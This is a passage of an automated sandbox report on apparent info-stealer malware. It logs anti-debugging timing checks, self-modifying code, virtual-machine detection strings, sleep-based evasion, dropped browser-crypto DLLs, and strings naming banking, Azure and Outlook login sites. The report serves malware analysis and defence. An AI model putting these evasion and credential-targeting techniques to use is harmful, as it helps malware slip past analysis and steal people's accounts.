Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2A9 second address: 82F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2B2 second address: 82F2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2B8 second address: 82F2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F2BC second address: 82F2C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F426 second address: 82F42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F42B second address: 82F432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 82F432 second address: 82F43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Special instruction interceptor: First address: 58C43A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Special instruction interceptor: First address: 594634 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Special instruction interceptor: First address: 61199A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 85C43A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 864634 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 8E199A instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Code function: 7_2_04BF0CB7 rdtsc 7_2_04BF0CB7
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1036 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1254 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 362 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Window / User API: threadDelayed 1457
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Window / User API: threadDelayed 946
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe API coverage: 0.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 3168 Thread sleep count: 269 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3812 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3812 Thread sleep time: -37000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2992 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2992 Thread sleep time: -70035s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5540 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5540 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5820 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4092 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3856 Thread sleep count: 362 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3856 Thread sleep time: -10860000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6432 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6432 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6692 Thread sleep time: -1080000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3856 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe TID: 6728 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Thread sleep count: Count: 1457 delay: -10
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C56C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 06f6d9547f.exe, 0000000F.00000003.3011183886.0000000001517000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0244247334.exe, 0000000E.00000002.3055852446.000000000191B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: GHCGDAFC.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: GHCGDAFC.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: GHCGDAFC.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000D.00000002.3240756659.0000000000839000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GHCGDAFC.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: GHCGDAFC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GHCGDAFC.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GHCGDAFC.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GHCGDAFC.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: GHCGDAFC.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GHCGDAFC.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: CFBAKEHIEB.exe, 00000007.00000002.2503519634.0000000000569000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000B.00000002.2531628183.0000000000839000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2536191640.0000000000839000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.3240756659.0000000000839000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: GHCGDAFC.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
